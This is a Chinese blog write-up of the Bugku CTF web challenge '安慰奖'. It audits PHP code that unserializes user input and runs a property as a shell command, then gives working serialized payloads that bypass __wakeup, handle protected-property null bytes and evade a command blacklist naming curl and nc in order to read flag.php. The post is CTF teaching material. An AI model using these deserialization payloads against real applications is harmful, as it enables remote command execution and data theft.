Bugku CTF 每日一题 安慰奖

最新推荐文章于 2022-11-15 16:17:36 发布
最新推荐文章于 2022-11-15 16:17:36 发布
阅读量650 收藏 2
点赞数
分类专栏: ctf 文章标签: php 序列化 反序列化 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42263820/article/details/122587396
版权

安慰奖

打开网页啥都没有
习惯性按f12发现一段base64,解码后发现是

 YmFja3Vwcw== 
 backups(备份)

于是想到了网站备份,但是备份目录忘了
于是用dirsearch扫了一下 发现是index.php.bak
在这里插入图片描述

于是下载源码发现是代码审计

<?php

header("Content-Type: text/html;charset=utf-8");
error_reporting(0);
echo "<!-- YmFja3Vwcw== -->";
class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    function __wakeup()
    {
        $this->username = 'guest';
    }

    function __destruct()
    {
        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
        if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
        }else
        {
            echo "</br>给你个安慰奖吧,hhh!</br>";
            die();
        }
    }
}
    $select = $_GET['code'];
    $res=unserialize(@$select);
?>

开始审计

class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    定义username和cmd变量
----------------------------------------------
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    java知识不做赘述
----------------------------------------------
    function __wakeup()
    {
        $this->username = 'guest';
    }
反序列化的wakeup函数,如何绕过可见我这篇文章
此处是将username的值改为guest
https://blog.csdn.net/qq_42263820/article/details/112719099

----------------------------------------------
   if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
       一堆正则
----------------------------------------------
 if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
 如果username的值为admin将cmd的值传给a变量并输出执行
----------------------------------------------
    $select = $_GET['code'];
    $res=unserialize(@$select);
  get获取code的值传给select并把select的值反序列化后传给res

所以唯一可以传的是code的值 所以用code里面包含username和cmd即可传值给他们
因为类名是ctf,所以构造为

code=O:3:"ctf":2:{s:8:"username";s:5:"admin";s:3:"cmd";s:2:"ls";}

绕过wakeup函数就在第一个2改为3即可(原因在上面写过了)

code=O:3:"ctf":3:{s:8:"username";s:5:"admin";s:3:"cmd";s:2:"ls";}

但是要注意上面的写错了,因为定义的是private,在php序列化的时候private和 protected 变量会引入不可见字符%00,所以username和cmd前面要加或%00*%00(这里算三个字符)
所以正确的应该是这样

code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:2:"ls";}
这里传了个ls命令
而cmd的传值中cat,tac,more,less,head都被过滤了, 但是在研究后发现tac命令没有过滤,所以可以用tac命令查看文件

所以直接用tac命令后修改为

code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

得到flag!

彼岸花苏陌
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku 安慰
濯君
12-31 1939
打开网页,发现什么也没有,查看源码,发现YmFja3Vwcw==,base64解码,得到backups 查看根目录下index.php.bak文件,得到代码 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; #base64解码,backups class ctf { protected $username = 'hac.
BUGKU——安慰
doraemon12345的博客
06-08 215
昨天刚写了一道绕过_wakeup()函数的题目今天又遇到一道,刚好拿来复习一下 _wakeup()函数在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过_wakeup()函数的执行 打开题目发现是个空白页面,查看一下源码,有个base64解码,解密出一个单词,意思是备份,然后尝试下载备份,这里有几种方式,因为不知道是哪种,就一 一尝试 网站源码:www.zip .bak文件:xxx.bak(一般题目会提示文件名,不提示就尝试index.php.bak) vim缓存:xxx.swp意外退出为xxx
bugku】-安慰
weixin_52116519的博客
04-01 785
考点1:绕过__wakeup() 当序列化字符串表示对象属性个数的值大于真实个数的属性时,就会跳过__wakeup()的执行。 考点2:私有属性绕过 ①protected属性被序列化的时候属性值会变成:%00*%00属性名。 private属性被序列化的时候属性值会变成:%00类名%00属性名。 ②直接url编码输出。 考点3:``反引号,可以作为系统命令输出给var_dump $a = `$this->cmd`; var_dump($a); 解题 1、看源码 2、base64解码,是“备份”的意
Bugku_安慰
CaiNiaoLW的博客
02-27 632
打开页面,发现是空白的,查看源码,发现一段base64加密的密文, 解密后是backups单词,这个意思是备份,可以猜测是跟index.php.bak文件有关,下载下来备份文件后,获得后台代码,开始代码审计。 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $user
Bugku安慰
qq_46230755的博客
01-30 367
打开来查看源代码发现提示 YmFja3Vwcw== base64解码后得到:backups 扫描一下网站 在index.php.bak找到备份文件 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku web 安慰
m0_58189778的博客
08-19 327
题目:安慰 知识点:php反序列化 工具: 解题: 点开链接: 空白页面,然后查看源码,发现注释中有base64,解码得到backups,故猜测应该是和备份文件有关。 用御剑扫描,发现index.php.bak,下载打开: 先分析这个类,大致观察一下能拿到flag的地方就是__destruct中的反引号,这里执行了类的cmd属性;再看到后面的反序列化,这里应该是要构造相应的序列化字符串,当__destruct自动执行时命令执行即可。构造payload需要注意的是代码中过滤了.
BugKu_安慰
羽的博客
07-02 178
解码 告诉我有备份文件。 找到这个 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __construct($u...
bugku安慰(绕过__wakeup)
EC_Carrot的博客
12-24 932
题目 右键源代码发现<!-- YmFja3Vwcw== -->,base64解码提示说有备份 我这里用dirsearch扫到备份文件为index.php.bak 源码: error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __construct($u
bugku-web-安慰
m0_57954651的博客
11-15 776
唯一可以传的是code的值 所以用code里面包含username和cmd即可传值给他们因为类名是ctf 所以构造为。exit('flag能让你这么容易拿到吗?get获取code的值传给select并把select的值反序列化后传给res。如果username的值为admin将cmd的值传给a变量并输出执行。打开 进行代码审计 是php序列化 反序列化的内容。存在一个flag.php文件 但是访问没有结果。此处是将username的值改为guest。点开链接 是空白页面。
三十七、bugku安慰
山兔的博客
09-05 152
打开网页,一片空白,查看源码,发现YmFja3Vwcw==,base64解码得到backups。 用御剑土司没跑出来,御剑1.5跑出来了/flag.php,/index.php.bak。 下载文件,得到了源码,发现是考序列化反序列化。 百度搜索相关知识, _wakeup()当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过_wakeup()的执行。 序列化就是将对象转换成字符串。字符串包括属性名、属性值、属性类型和该对象对应的类名。反序列化则相反将字符串重新恢复成对象。 对象的序列化利于对象的
Bugku WEB 安慰
qq_41696858的博客
07-18 226
<?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; #base64解码,backups class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __construct($username,$cmd)
Bugku—凯撒部长的
王嘟嘟的博客
10-25 4766
0x00 前言 昨天忘记写CTF的题目了,所以这个是今天补充的。 题目 0x01 Start 这里一看就知道是凯撒大帝的密码。 使用框架直接解密。 MSW{byly_Cm_sIol_lYqUlx_yhdIs_Cn_Wuymul_il_wuff_bcg_pCwnIl_cm_u_Yrwyffyhn_guh_cz_sio_quhn_ni_ayn_bcm_chzilguncihm_sio_wuh_dic...
PHP序列化及__wakeup()函数漏洞利用
TenG的博客
12-19 1280
前言 本篇文章讲述php序列化反序列化的知识,写的内容也是参考了一些大佬的文章再加上自己的理解,同时结合我在做题中遇到的题目来叙述,如有错误的地方欢迎大佬们指正。 正文 序列化:将对象转换成字符串。字符串包括 属性名 属性值 属性类型和该对象对应的类名。 反序列化:就是在适当的时候把这个字符串再转化成原来的对象。 序列化中常见的魔法函数: __construct()创建对象时调用 __destruct()销毁对象时调用 __toString()把对象转换为字符串,打印一个对象时被调用 __sleep(
BugkuCTF 字符?正则?
最新发布
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值